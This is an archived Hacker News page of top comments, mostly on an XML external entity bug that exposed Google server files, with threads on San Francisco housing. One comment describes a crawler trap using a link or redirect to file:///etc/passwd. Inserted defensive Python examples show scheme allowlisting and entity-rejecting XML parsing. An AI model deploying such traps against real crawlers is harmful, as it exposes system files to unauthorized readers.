hacker news with inline top comments    .. more ..    18 Apr 2014 Best
1
How we got read access on Google's production servers detectify.com
1100 points by detectify  6 days ago   192 comments top 25
1
mixmax 6 days ago 5 replies      
In large production environments it's almost impossible to avoid bugs - and some of them are going to be nasty. What sets great and security conscious companies apart from the rest is how they deal with them.

This is an exemplary response from google. They respond promptly (with humor no less) and thank the guys that found the bug. Then they proceeded to pay out a bounty of $10.000.

Well done google.

2
numair 6 days ago 6 replies      
... And this is why you want to discontinue products and services your engineers can't be motivated to maintain. Amazing.

This should scare anyone who has ever left an old side project running; I could see a lot of companies doing a product/service portfolio review based on this as a case study.

3
msantos 6 days ago 0 replies      
A few webcrawlers[1] out there follow HTTP redirect headers and ignore the change in schemas (this method is different from OP's but achieves the same goal).

So anyone can create a trap link such as

    <a href="file:///etc/passwd">gold</a>

Or

    <a href="trap.html">trap</a>

once trap.html is requested the server issues a header "Location: file:///etc/passwd"

Then it's just a matter of sitting and waiting for the result to show up wherever that spider shows its indexed results.

[1] https://github.com/scrapy/scrapy/issues/457
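
A crawler-side guard against both traps described in the comment above, as an added example that is not part of the original comment or of any crawler's code: every extracted link and every redirect target is re-checked against a scheme allowlist before it is fetched. The host `site.example`, the `fetch` callback contract and the constructed site table are assumptions made so the example runs offline.

```python
from urllib.parse import urljoin, urlsplit

ALLOWED_SCHEMES = {"http", "https"}
REDIRECT_CODES = {301, 302, 303, 307, 308}


class BlockedURL(Exception):
    """The crawler refused to fetch or follow this URL."""


def check_url(url):
    """Return url unchanged if it is safe to hand to the fetcher, else raise."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise BlockedURL(f"scheme {parts.scheme!r} not allowed: {url}")
    if not parts.hostname:
        raise BlockedURL(f"no host in URL: {url}")
    return url


def crawlable_links(page_url, hrefs):
    """Resolve hrefs found on a page and keep only those that pass check_url."""
    kept = []
    for href in hrefs:
        try:
            kept.append(check_url(urljoin(page_url, href)))
        except BlockedURL:
            pass  # e.g. <a href="file:///etc/passwd">
    return kept


def follow(start_url, fetch, max_hops=5):
    """Follow redirects by hand, re-validating the target of every hop.

    fetch(url) must return (status, headers, body) and must NOT follow
    redirects itself. Returns (chain_of_urls, final_body).
    """
    url = check_url(start_url)
    chain = [url]
    for _ in range(max_hops):
        status, headers, body = fetch(url)
        if status not in REDIRECT_CODES:
            return chain, body
        location = headers.get("Location")
        if not location:
            raise BlockedURL(f"redirect without Location from {url}")
        # The scheme may change here, so the check is repeated on each hop.
        url = check_url(urljoin(url, location))
        chain.append(url)
    raise BlockedURL(f"more than {max_hops} redirects from {start_url}")


# Constructed stand-in for the network (hypothetical host and pages).
CONSTRUCTED_SITE = {
    "http://site.example/old": (301, {"Location": "/new"}, ""),
    "http://site.example/new": (200, {}, "hello"),
    "http://site.example/trap.html": (302, {"Location": "file:///etc/passwd"}, ""),
    "http://site.example/loop": (302, {"Location": "/loop"}, ""),
}


def fake_fetch(url):
    return CONSTRUCTED_SITE[url]


def verdict(url):
    """Summarise what the guarded crawler does with url."""
    try:
        chain, _ = follow(url, fake_fetch)
        return "fetched " + chain[-1]
    except BlockedURL as exc:
        return f"blocked: {exc}"


if __name__ == "__main__":
    hrefs = ["file:///etc/passwd", "trap.html", "/new"]
    for link in crawlable_links("http://site.example/", hrefs):
        print(link, "->", verdict(link))
```
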

4
raverbashing 6 days ago 5 replies      
This is another reason not to use XML, plain and simple

It's too much hidden power in the hands of those who don't know what they're doing (loading external entities pointed in an XML automatically? what kind of joke is that?)

5
chmars 6 days ago 3 replies      
The guys behind this report have an interesting pricing model: Pay what you want!

https://detectify.com/pricing

The pricing model has apparently worked so far. Are any active users of Detectify here who can share their experience?

6
cheald 6 days ago 1 reply      
XML legitimately scares me. The number of scary, twisted things it can do makes me shudder every time I write code to parse some XML from anywhere - it just feels like a giant timebomb waiting to happen.
7
halflings 6 days ago 1 reply      
I hope it doesn't get unnoticed that the guys who discovered this vulnerability created a really great product, Detectify:

https://detectify.com/

They also discovered vulnerabilities in many big websites (dropbox, facebook, mega, ...). Their blog also has many great write-ups: http://blog.detectify.com/

8
njharman 6 days ago 0 replies      
take away: XML should not be used (at least as user input). It is too powerful, too big. It is much too hard and expensive to test and validate.

Input from potentially malicious users should be in the simplest, least powerful of formats. No logic, no programmability, strictly data.

I'm putting "using XML for user input" in same bucket as "rolling your own crypto/security system". That is you're gonna do it wrong, so don't do it.

9
raesene3 6 days ago 3 replies      
Interesting to see this hit big companies like google. The problem, I think, stems from the idea that most people treat XML parsers as a "black box" and don't enquire too closely as to all the functionality that they support.

Reading the spec which led to the implementations can often reveal interesting things, like support for external entities.

10
dantiberian 6 days ago 1 reply      
Very cool hack. Is $10,000 around the top end of what Google will pay out? This seems like quite a serious bug as far as they go.
11
plq 6 days ago 0 replies      
For those who'd like to know more about xml-related attack vectors, here's a nice summary: https://pypi.python.org/pypi/defusedxml
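
The thread's recurring point is that parsers accept DTD features such as external entities unless told otherwise. The following added example (not from the thread, and not defusedxml's own code) uses only the standard library's expat bindings to refuse any document that declares or references entities, and optionally any DOCTYPE at all. The sample documents are constructed for the example.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class ForbiddenXML(ValueError):
    """Untrusted XML used a DTD feature this parser refuses to process."""


def parse_untrusted(data, forbid_dtd=False):
    """Parse bytes into an ElementTree element, rejecting entity tricks.

    Raises ForbiddenXML on any entity declaration or external entity
    reference, and on any DOCTYPE when forbid_dtd is True.
    """
    builder = ET.TreeBuilder()
    parser = expat.ParserCreate()
    parser.StartElementHandler = builder.start
    parser.EndElementHandler = builder.end
    parser.CharacterDataHandler = builder.data

    def on_doctype(name, system_id, public_id, has_internal_subset):
        if forbid_dtd:
            raise ForbiddenXML(f"DOCTYPE not allowed: {name}")

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # External entities carry a system identifier; internal ones a value.
        kind = "external" if system_id else "internal"
        raise ForbiddenXML(f"{kind} entity declared: {name}")

    def on_external_ref(context, base, system_id, public_id):
        raise ForbiddenXML(f"external entity referenced: {system_id}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref

    parser.Parse(data, True)  # exceptions raised in handlers propagate
    return builder.close()


def verdict(data, forbid_dtd=False):
    """Return a one-line outcome string for a document."""
    try:
        root = parse_untrusted(data, forbid_dtd=forbid_dtd)
        return f"ok: {root.tag}"
    except ForbiddenXML as exc:
        return f"rejected: {exc}"
    except expat.ExpatError as exc:
        return f"malformed: {exc}"


# Constructed sample documents.
BENIGN = b"<order><item>book</item></order>"
EXTERNAL_ENTITY = (
    b'<!DOCTYPE order [<!ENTITY x SYSTEM "file:///etc/passwd">]>'
    b"<order><item>&x;</item></order>"
)
INTERNAL_ENTITY = (
    b'<!DOCTYPE order [<!ENTITY a "aaaa">]>'
    b"<order><item>&a;</item></order>"
)
DTD_ONLY = b"<!DOCTYPE order><order/>"

if __name__ == "__main__":
    for name, doc in [("benign", BENIGN), ("external", EXTERNAL_ENTITY),
                      ("internal", INTERNAL_ENTITY), ("dtd only", DTD_ONLY)]:
        print(f"{name:9} {verdict(doc)}  | strict: {verdict(doc, forbid_dtd=True)}")
```
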
12
enscr 6 days ago 4 replies      
Is there a startup that can help automate custom attacks on websites? Like guide the webmaster to look for holes in their setup. I'm guessing some security expert can do a good job educating new businesses on how to prepare for the big bad world.
13
mwcampbell 5 days ago 0 replies      
I'm surprised nobody has mentioned containers, e.g. Docker, as a way of limiting the damage from this kind of bug. In a container whose only purpose is to run the application, /etc/passwd should be as uninteresting as:

    root:x:0:0:root:/:/bin/sh
    bin:x:1:1:bin:/dev/null:/sbin/nologin
    nobody:x:99:99:nobody:/dev/null:/sbin/nologin
    app:x:100:100:app:/app:/bin/sh

14
peterkelly 6 days ago 1 reply      
I never understood why internal or external entities were included in XML. Can anyone explain what useful purpose they serve?
15
kirab 6 days ago 1 reply      
I think they couldn't read /etc/shadow, so it's not that bad at first. But then they could surely access some configuration file of the application itself, probably containing DB creds and of course more information which helps to find more vulns.
16
antocv 6 days ago 4 replies      
So, when you have read access to googles prod servers, what else would be fun to do besides reading /etc/passwd ?

Getting the source?

17
ajsharp 6 days ago 0 replies      
Cheers to google for properly compensating these guys for their findings.
18
yummybear 6 days ago 0 replies      
You should be aware that pixelating or blurring screenshots is likely not sufficient to ensure that the contents are unrecoverable.
19
h1ccup 6 days ago 0 replies      
Well done. I had to deal with some similar issues with my own project, and they weren't legacy code either. This should push me to go through some of my code again.
20
NicoJuicy 6 days ago 0 replies      
Offtopic: the reply was generated with Google's internal meme generator, I read about it here: https://plus.google.com/+ColinMcMillen/posts/D7gfxe4bU7o

Actually dug it when I read it a few years ago and awesome knowing that it was probably used for this reply :)

21
NicoJuicy 6 days ago 0 replies      
A job well done. This is actually impressive and quite interesting to see after what you are searching for (afterwards it seems logical :))
22
pearjuice 6 days ago 0 replies      
That must have been a nasty call from Sergey to NSA headquarters earlier this week.

"Sir, I am sorry to inform you that another backdoor has been found. We will introduce two more as agreed upon in our service level agreement."

23
sebban_ 6 days ago 0 replies      
Awesome work! The bounty is a bit low though.
24
blueskin_ 6 days ago 0 replies      
I wonder how many of the blurred entries were NSA.
25
4ad 6 days ago 20 replies      
Just $10k?

This sells for at least 10 times more on the black market. Why would one rationally choose to "sell" this to google instead of the black market?

Some people don't break the law because they are afraid to get caught, but I like to believe that most people don't break the law because of the moral aspect. To me at least, selling this on the black market poses no moral questions, so, leaving aside "I'm afraid to get caught", why would one not sell this on the black market? Simple economic analysis.

Very serious question.

2
SF's Housing Crisis Explained techcrunch.com
611 points by minimaxir  3 days ago   459 comments top 45
1
gojomo 2 days ago 8 replies      
This piece is very perceptive in portraying Prop 13 property-tax caps and rent-control as sibling policies, each feeding destructive "I've got mine" politics. They both bribe incumbent owners/renters/voters with an economically valuable seniority privilege, at the expense of the future and flexibility. Children and young adults suffer the most: they move the most, and none have the benefit of paying frozen base rates established 20-30 years ago.

I wonder if both rent-control and prop-tax-caps could be knocked down in an equal-protection lawsuit. Why does the person who moved in yesterday, perhaps far needier than the longer-term resident/owner (and just as deserving of basic civic services) have to pay so much more? Is duration-of-residence a legitimate basis for such strong civic discrimination rooted in law?

2
selmnoo 2 days ago 7 replies      
Very interesting, that Piketty's "Capital in the 21st Century" is introduced in this article:

A lot of other VCs and founders are also digesting Thomas Piketty's new book, Capital in the 21st Century. With more than 200 years of data, it chronicles an inexorable rise in inequality that was punctuated in the middle of the 20th century by the Great Depression and World War II followed by 30 years of evenly-spread prosperity. Ultimately, it advocates a globally-coordinated tax on wealth.

I know that it's taboo on HN to get overly political, but I think because of Piketty's work we should talk about it (particularly, because Piketty's new piece is so groundbreaking [1] and incredibly well-backed with data). What do you guys think of his "global wealth tax" -- tax on capital (including real property), in the context of the new SV riches?

[1]: The book is being received as "the most important economics text of the decade" by a lot of high-placed economists, etc.: http://en.wikipedia.org/wiki/Capital_in_the_Twenty-First_Cen...

3
100k 2 days ago 4 replies      
This is by far the most comprehensive overview of the Bay Area's messed up development priorities I've seen in one place. Kim-Mai Cutler does a great job stringing all the threads of the housing crisis together.

I don't think San Francisco can build its way out of outrageous rents alone. The other cities in the Bay Area need to step up and provide the type of urban housing close to transit that people want. No more surface parking lots next to train stations.

4
malandrew 2 days ago 3 replies      
I wonder if SF could experience some tech detroitification in about 10-20 years, or possibly sooner.

As a tech worker here, I and other engineers I know are becoming disenfranchised with the housing prices around here to the point that I'm casually exploring where I might want to move next in 4 years or so if this situation doesn't reverse itself.

With the number of engineers all feeling the same, it's possible to find enough people willing to be a co-founder and move to a much cheaper part of the world during the formative months/years when your company is pre-profit. Take Silicon Valley investing connections, a mobile workforce, rising housing prices and you basically have a confluence of forces that will accelerate a diaspora of engineers to more places in the world without necessarily giving up on the tech community that makes SF so desirable. Once decent sizeable tech communities show up in more places, the greater the likelihood that engineers in the Bay Area look around and tell themselves "This just isn't worth it. I'm paying a premium to be around colleagues, but now my colleagues are everywhere and it's just not worth it anymore."

At the end of the day every engineer without rent control is going to face a financial decision once a year when rents are raised that could make moving elsewhere more attractive. What's the point of improving at your job and earning raises when most of your raise ends up going into your landlord's pocket. Do that 2-3 times and you are either going to look into someway of getting into rent control unit or you're going to start considering other options elsewhere.

All you really need to stay in the area for is to create a solid enough professional network that you'll gain access to the smart capital in the region. Once you have that, you can go anywhere since investors will know you, what you're capable of and that investing in you and your business is a good idea. If this happens often enough, you're going to start to see more VCs comfortable with this approach that they'll be able to tell offer job candidates coming through the VC hiring offices positions in portfolio companies located in places that might be more desirable to a tech worker than SF.

I stay in SF because some of the most interesting tech jobs are here. Once that is no longer a valid assumption and my professional network is sufficiently geographically distributed, I no longer have anything tying me solely to San Francisco.

I can't count the number of conversations I've had with other engineers about thinking about moving to Berlin or Portland or even trying to set up shop in some cheap remote paradise where we would have the financial liberty to invite friends to come out and hang out in a guest room for weeks to months at a time so long as they pay the airfare and living arrangements. Top places on my list when I entertain ideas like this are small beach towns along the Northeast of Brazil. I'm often amazed at how many of my engineer friends are onboard with these ideas, more than willing to exchange San Francisco so long as they know they will have engineering peers and interesting engineering problems to solve in some other locale.

Even the cultural attractions that made San Francisco awesome have been co-opted by the hipster culture and gone mainstream enough that SF no longer has the strong lead on novel cultural innovations that it once had.

    "It's an odd thing, but anyone who disappears is said to be
    seen in San Francisco. It must be a delightful city and
    possess all the attractions of the next world"
    -- Oscar Wilde

All the attractions of the next world are starting to crop up everywhere more and more and here in SF less and less. Eventually the barrier to going elsewhere and still working on fun engineering problems will be easily surmountable.

5
forgottenpass 2 days ago 0 replies
>Today, the tech industry is apparently on track to destroy one of the world's most valuable cultural treasures, San Francisco, by pushing out the diverse people who have helped create it. At least that's the story you've read in hundreds of articles lately.

>It doesn't have to be this way. But everyone who lives in the Bay Area today needs to accept responsibility for making changes where they live so that everyone who wants to be here, can.

I don't know if drastically changing the housing landscape of SF will destroy the culture that made everyone want into the city in the first place, but asserting that it won't is just as tenuous as asserting it will.

All I ever see is rationalization that it won't, because the tech community takes it as axiomatic that they must pile into the city. By debating the conclusion we are tricked into accepting the form.

For example: "But everyone who lives in the Bay Area today needs to accept responsibility for making changes"

That's a lot of people. Including ones hostile to your goals. You would need to get a smaller and friendlier set of people on board to make a slightly-more geographically disperse tech scene work in the Bay Area. The self-fulfilling business "common sense" about SF is much more momentum than sense.

6
flomo 2 days ago 2 replies      
I think this quote really nails the mentality in the city:

> As political scientist and longtime San Francisco observer Richard DeLeon puts it:

San Francisco has emerged as a semi-sovereign city - a city that imposes as many limits on capital as capital imposes on it. Mislabeled by some detractors as socialist or radical in the Marxist tradition, San Francisco's progressivism is concerned with consumption more than production, residence more than workplace, meaning more than materialism, community empowerment more than class struggle. Its first priority is not revolution but protection - protection of the city's environment, architectural heritage, neighborhoods, diversity, and overall quality of life from the radical transformations of turbulent American capitalism.

7
tedsanders 2 days ago 1 reply      
For another great take on the housing crisis in SF and elsewhere, I recommend a book that I first heard about on Hacker News, Matt Yglesias's The Rent is Too Damn High: http://www.amazon.com/The-Rent-Too-Damn-High-ebook/dp/B0078X...

The over-regulation of home building by cities is an issue not really on the public's radar, unfortunately.

8
atgreen 2 days ago 0 replies      
I love the Mountain View burrowing owl reference. Here's a '96 usenet news article I posted about the endangered burrowing owls I would bike past every day in Mountain View. It just happened to be right where SGI was about to build their new HQ, and is now the heart of the Google campus. I had just moved to Silicon Valley from Canada when I posted this....

https://groups.google.com/forum/#!topic/rec.birds/vPvrRW_fVX...

9
kijin 2 days ago 8 replies      
Just pack up and leave the damn place already.

Sorry to be blunt, but that's how "supply and demand" is really supposed to work. If Seattle supplies the same quality of housing for half the cost of San Francisco, buyers/renters should flock to Seattle, thereby reducing demand in SF and eventually causing SF housing prices to come down until the market finds an equilibrium. Trying to lobby for "below-market-price" housing is always going to be a losing game; the only long-term solution is to make the market price lower.

Unfortunately, competition among cities to attract residents is not like competition in other industries. A lot of people are stuck in a relatively small geographical area their whole lives due to employment, their children's education, various kinds of emotional attachment, and the sheer difficulty of uprooting themselves from a familiar neighborhood. This creates a captive market, severely limiting the effectiveness of inter-city competition. And of course, whenever there's a captive market, there's somebody who profits from it. In the case of SF's housing market, entrenched neighborhood groups and "below-market-price" renters enjoy benefits at the expense of newcomers to the city. Perhaps they actually deserve those benefits. Still, it's unfair to everyone else.

But there's one group of people who can afford not to be bound by the usual excuses that keep people stuck in a captive market. That's us, the techies. We don't need to be in any particular city in order to write code. Most of us are young and don't have kids. Few of us have any "root" in the Bay Area, so we couldn't care less about being uprooted [1]. There is no reason for us to be a part of San Fran's captive housing market. We can pack up and leave, all 8% of us if possible. That would be "supply and demand" doing its work.

Of course, there are a few problems with this proposal, including the fact that there really is such a thing as social networking of the offline kind. The Bay Area undoubtedly has one of the best tech "scenes" in the world. But I see it as a problem that needs to be fixed, not merely an advantage that we're free to exploit. HN, for example, requires everyone to move to the Bay Area, perhaps for a good reason. But in doing so, they directly contribute to, and exacerbate, the hideous distortion of the Bay Area's housing market. It's like mandating that everyone meet at a particular Starbucks. It makes sense when everyone you want to meet is already a regular of that Starbucks, but when the manager of Starbucks begins to take advantage of its captive clientele, you should seriously start considering an alternative.

Remember, the only vote that the market respects is a vote with your feet, i.e. a realistic threat to do business with a competitor.

[1] Disclaimer: I've lived in at least seven different cities in three continents, and harbor no particular emotional attachment to any of them. Apparently I'm incapable of developing an emotional attachment to geographical coordinates. But I must confess that I kinda like it that way.

10
205guy 2 days ago 1 reply      
I haven't finished reading all the comments, but here's my take on the article:

Great for mentioning the prop13-rentcontrol duality, a lot of people conveniently forget one side or the other.

Great for delving into the politics of it all, including the neighborhood associations.

Not-so-great: it was touched on but not really elaborated: why the peninsula (Palo Alto, Mountain View, Cupertino, the heart of SV) are not densifying to provide housing for the corporations they have. Some of the downtowns are very desirable, but still full of single-family homes. Some of the commercial space could be built up with housing over the businesses, and then these towns would develop even more character. I think the tech industry got a free-ride (heh) in building huge campuses in towns that have little residential growth (and even the towns' resistance to growth is mentioned). Google, Apple, etc, should be pushing on Mountain View to build 10,000 residential units in the area. It's happening a tiny bit, but not nearly as fast as the companies are expanding.

Most people don't choose 1-hour 40-mile commutes if they can avoid them. But the corporate buses make that commute feasible. I actually wonder if bus transport is reported by the employees as income for taxation purposes, and if not why?

Finally, this issue really seems to stem from regional politics. SF has to compete with suburbs on tax breaks to companies, yet the suburbs can offload all the residential problems to the city. Seems like there should be state-wide rules that make this fairer.

11
dnr 2 days ago 0 replies      
Finally, an article on the situation that puts an accurate (i.e. large) amount of the blame on the cities of the peninsula and south bay.

Also, prop 13 is the worst thing ever. Reading that section was really depressing.

12
capkutay 2 days ago 0 replies      
I think that SF's proud antiquity is coming back to bite it. The older generations fought against development for decades, now the demand for property is so high they can't afford to live here anymore.
13
Houshalter 2 days ago 1 reply      
That was a very long but very good article.

I still don't get protests over evictions or for rent control. They are literally forcing the landlord to subsidize their cost of living. But why make only landlords pay for the subsidy? Why not tax everyone? I'm ok with income redistribution, but not when it is done so inefficiently and at the expense of a specific group.

14
timr 2 days ago 0 replies
"But in places where zoning regulations create artificial limits on home production, the final prices to home buyers jump far above construction costs. In the 1980s and 1990s, they found that virtually all of San Francisco's home prices were at least 140 percent above base construction costs."

The papers she's citing here exclude apartments from the analysis. They're talking about single-family homes:

http://www.nber.org/papers/w8835.pdf

"The housing price data used in this paper to create the relationship between home prices and construction cost comes from the American Housing Survey (AHS). We focus on observations of single unit residences that are owner occupied, and exclude condominiums and cooperative units in buildings with multiple units even if they are owned"

Probably not incredibly relevant to a discussion of rental prices.

15
cft 2 days ago 3 replies      
I think building more upscale condos/housing will attract even more money, and there will be a positive feedback loop, so the housing will become even more expensive. This can be observed in Manhattan.
16
melindajb 2 days ago 0 replies      
As a 12 year plus SF Resident, married to a native San Franciscan, who has both rented and now owns property, and who follows local politics closely; I can report this is one of the most complete, articulate, and accurate summaries of the situation I've ever read.

Please encourage others to read this.

17
CmonDev 2 days ago 0 replies
"... one of the world's most valuable cultural treasures, San Francisco..." - oh, Americans :).
18
overgryphon 2 days ago 0 replies      
A lot of the tech employees that are being protested are young, single, and much more willing to move for economic reasons than families. The ability to buy a house in the future, not deal with protesters, and probably make more money overall in a city with lower rents is pretty enticing. Silicon Valley has a lot of tech companies, but now Seattle and Austin do too- not as many, but growing. At some point the hatred misdirected at tech employees could result in San Francisco suffering from less tech investment than other more stable cities.
19
tizzdogg 2 days ago 1 reply      
One thing the article doesn't really touch on is how rent control, as well as San Francisco's many other pro-tenant laws, actually incentivizes landlords to keep rental units off the market. It's basically impossible to evict bad tenants in San Francisco for reasons other than non-payment of rent. I'm not a real estate lawyer, but my impression is it can take years and tons of legal fees to get a bad tenant out, even for reasons that in most other cities would be easy cause for eviction.

I personally know a lot of mom-and-pop landlords with vacant rental units who can't be bothered to rent them, because dealing with bad tenants in SF is such a pain. These are middle-class people who bought multiple-unit buildings 20 or 30 years ago when it was affordable and don't need the rental income, and don't want the hassle. I would guess that there are thousands of units like this across the city.

20
lsiebert 2 days ago 2 replies      
One of the things the article addresses is the fact that other communities need to build affordable housing, not just SF.

I for one am going to speak to some local political figures. If you live in any city in the SF bay area, you may as well do the same. Write a letter. Express your interest in the creation of apartments in the city. Because if you build housing in the area, people will live there.

21
lstamour 1 day ago 1 reply      
Am I the only one who thought 6,000 new homes was an extremely low number?

Maybe. Here in Toronto, we've had a rough average of 35,000 new homes each year. I'm used to seeing new buildings and cranes all over town. It's not a boom town, but I've yet to hear of a shortage either...

And Toronto's population is roughly 3.1x that of San Francisco, but it's held steady for roughly the last decade at least. 35/6 is 5.8x less, and given the population growth in SF, the number of new builds should be at least double; 12k perhaps.

Equally funny, Toronto also had a freeway revolt and succeeded. So we have a relatively livable downtown, plus growth. Go figure. Some corridors in Toronto are nothing but skyscrapers. Height restrictions do exist, but are raised on a case-by-case basis (e.g. public art, parks can help negotiate). Even areas that fought expressways, while mostly single-dwelling, have allowed high rises along nearby major streets.

That said, we're still trying to make plans to destroy the Gardiner Expressway, our Embarcadero it seems.

22
Pro_bity 2 days ago 0 replies      
This is the best TechCrunch article ever written. I wish they let their journalists spend more time doing well researched pieces like this.
23
danols 2 days ago 0 replies
"one of the world's most valuable cultural treasures" Travel much outside of the US?
24
rwmj 2 days ago 5 replies      
The whole thing is ludicrous. Why can't tech workers work from home, from anywhere in the world?
25
blaurenceclark 2 days ago 0 replies      
I feel privileged to be mentioned as the homeless guy who was living on a couch at the end of the article :)
26
QuantumChaos 1 day ago 0 replies      
SF Housing Crisis Explained: Money allows one to buy things that other people (sometimes even people poorer than oneself) might have wanted to buy themselves. From this, two things follow: (1) we should redistribute money so that the very poor can at least buy something, and (2) nerds shouldn't be allowed to have much money, since no one likes them, and so why should they be allowed to buy things that other people want to buy.
27
sirdogealot 2 days ago 0 replies      
http://techcrunch.com/2014/04/14/sf-housing/

>The true culprit behind our housing problems: let us deflect blame to Mountain View's burrowing owl!

http://en.wikipedia.org/wiki/Shoreline_Park,_Mountain_View

>City of Mountain View evicted a pair of burrowing owls so that it could sell a parcel of land to Google to build a hotel at Shoreline Boulevard and Charleston Road.

...wtf?

28
hippich 2 days ago 0 replies      
it kinda makes sense, why existing population of SF tries to oppose any new building, but I still can't understand why bigger companies need to be there physically except maybe top managerial staff? It still makes sense to start a startup there, since this city is filled with like-minded people, but for bigger companies - why pursue it? Me and quite a few of my (married and with children) friends refuse even considering moving to SF exactly for this reason - too inadequate housing situation.
29
alxndr 2 days ago 0 replies      
And now, the KQED version of the article: http://blogs.kqed.org/newsfix/2014/04/14/San-Franciscos-Curr...
30
wil421 2 days ago 1 reply      
$8,000 a month for a two bedroom apartment, that is ridiculous. You could own several large houses where I live. I am tired of hearing about these silly SV-SF problems. Build more and the problem will stop.
31
beachstartup 2 days ago 2 replies      
i find it interesting that there's always such willful disregard for analytical inclusion of los angeles, the 2nd largest city/metro in the US, with a housing market that dwarfs all other metro areas but new york.

http://www.nytimes.com/2014/04/15/business/more-renters-find...

los angeles leads the nation in out-of-whack median rent/median income ratios. what does that suggest to me? that it's one of the last of the major US cities with poor and lower-middle class people living in it.

32
kzahel 2 days ago 2 replies      
This has a ton of great information and background but could definitely use some splitting up and organizing IMO. I don't know anybody but the most dedicated who could spend the hours it would take to digest this. It reads almost like a wikipedia page.
33
mathattack 2 days ago 0 replies      
Very long story. Only halfway through the original referenced article, and I can tell the writer has some solid economics chops.
34
stcredzero 2 days ago 0 replies      
Santa Clara Valley was some of the most valuable agricultural land in the entire world, but it was paved over to create today's Silicon Valley.

Exact same move the Maya pulled. At their tech level, that plus climate change ended their civilization.

35
patrickg_zill 2 days ago 0 replies      
TLDR "Stupidity combined with an unwarranted trust in government to over-ride reality".
36
dredmorbius 2 days ago 0 replies      
A great companion to Cutler's piece (which is excellent in its depth and analysis) is Andreas Schou's G+ post "So, why is Silicon Valley studded with an implausibly large number of abandoned barns, shacks, and other things that don't look like they belong here?":

https://plus.google.com/112482032780181267192/posts/FLUkbf4k...

This details a great many seemingly illogical (but actually financially sensible) consequences of California's 1978 property "tax reform" measure, Proposition 13.

Schou (recently hired by Google) is among the brightest lights on G+ in my experience. Much as I try to avoid the site, he draws me back at least to look.

37
qthrul 2 days ago 0 replies      
Item 7: Move to Raleigh, NC
38
firstOrder 2 days ago 0 replies      
> parts of the progressive community do not believe in supply and demand

Wow, those left wing progressives must really be crazy. It's not like tech CEO's would ever say there is a shortage of good technicians. They obviously believe in supply and demand, and that if demand, salary, working conditions and long-term career viability were good enough, the supply would arise.

39
pearjuice 2 days ago 0 replies      
Quite ironic how a blog constantly zooming in on the successes and ecosphere of the Valley attempts to explain the problem. The reason people are flocking to Silicon Valley is partially found in the overly-positive media reporting by Techcrunch and the like.
40
peterwwillis 2 days ago 1 reply      
tl;dr poor people don't want to be forced out of their homes or have their affordable local businesses shut down, and rich people want to make/keep a lot of money (partly by pushing poor people out of their homes and closing their affordable local businesses)

From my perspective SF does not have a housing crisis. They quite obviously have a culture crisis. Two opposed socioeconomic groups are at war, each trying to push the other out of the city. Housing remains plentiful, though obviously not affordable. You want to make housing really affordable? Introduce a large drug trade and a couple dozen gangs to bring up the mortality and crime rates, and you'll see those housing prices rocket downwards.

If you would rather live in a city with plentiful, affordable housing - 16% of which is abandoned or unliveable - come on over to my side of the country. You might want to bring a car and some pepper spray, though.

41
worklogin 2 days ago 0 replies      
I wonder what would have happened to the "Yuppie Eradication" project had the owners of said vehicles possessed defensive means such as firearms.
42
krashidov 2 days ago 5 replies      
Can somebody give me a perspective on how much they pay for housing ? I did a quick craigslist search expecting studios to be 2500 a month but it only took me a minute to find a very reasonable 950 A month studio apt.

https://sfbay.craigslist.org/sfc/apa/4423411641.html

43
madamepsychosis 2 days ago 1 reply      
HN, tell me why this wouldn't work: tax anyone renting an old property (i.e. built more than 15 years ago) for 50% of the difference between the rent now & before the tech boom. Put this to subsidise development of affordable housing in under-developed areas like SOMA.

Really, the lowest hanging fruit is just building reasonable transport through the whole city. At the moment it seems like only 30-40% of SF is actually being used. Demolishing freeways & replacing them with housing would not be a bad area either. Smaller houses, like the ones in European cities, would help a lot as well.

44
timr 2 days ago 6 replies      
"But this paper conflates correlation with causation. He argues that when there is a decline in new housing units, there is also a decline in price."

I knew this was going to happen: people have heard a trite sound-bite about "counter-intuitive" statistical logic so many times that they ignore that correlation is usually a pretty damned good signal for a causal relationship.

To wit: of course there's a correlation between price and new housing units -- because it is causally related. When prices go up, developers have greater incentives to build. More importantly, in a city with as high a density as San Francisco (and yes, folks, it is dense -- the second-densest city in the US, in fact), with as many architectural challenges (seismic, geographic, etc.) the limiting factor for new construction is land and materials, not red tape.

Nobody wants to hear this, but it's true. The fixed costs of building here are so high that developers won't do it unless rents go up. That's why new construction costs upwards of $4k for a 1-bedroom unit, and why new construction in SF doesn't place any real downward pressure on rents -- except (perhaps) in the very long term. At best, you're treading water. Developers don't build into a falling market.

But really, the best response for the people who keep asserting that "building up" is the magical solution is to point to Manhattan: it's the densest city in America, yet it's just as expensive as San Francisco, if not more so.

There are no magic bullets. San Francisco is expensive because there's a lot of money chasing a tiny little bit of land. You don't need a dissertation to explain it.

45
d23 2 days ago 0 replies      
> Sorry, this isn't a shorter post or that I didn't break it into 20 pieces.

Sorry, I didn't read it because you're a lazy writer who can't be bothered to consolidate the piece into a cohesive, easy-to-digest narrative. Oddly enough, I should be fish in a barrel, -- a mid 20s moving to SF for career; yet you couldn't take the time to work on maintaining my attention for more than a couple bullet points. The hilarious part is that you self-righteously reject that which you ultimately give in to, ("sorry [...] that I didn't break it into 20 pieces") presumably under the continuing theme of "look at me for being better at not being better than people."

So yeah, sorry I didn't read. Let me know how your blog post does.

3
Lens Blur in the new Google Camera app googleresearch.blogspot.com
575 points by cleverjake  1 day ago   232 comments top 55
1
jawns 1 day ago 5 replies      
Regarding the technology (achieving shallow depth of field through an algorithm), not Google's specific implementation ...

Up until now, a decently shallow depth of field was pretty much only achievable in DSLR cameras (and compacts with sufficiently large sensor sizes, which typically cost as much as a DSLR). You can simulate it in Photoshop, but generally it takes a lot of work and the results aren't great. The "shallow depth of field" effect was one of the primary reasons why I bought a DSLR. (Yeah, yeah, yeah, quality of the lens and sensor are important too.) Being able to achieve a passable blur effect, even if it's imperfect, on a cellphone camera is really pretty awesome, considering the convenience factor. And if you wanted to be able to change the focus after you take the picture, you had to get a Lytro light field camera -- again, as expensive as a DSLR, but with a more limited feature set.

Regarding Google's specific implementation ...

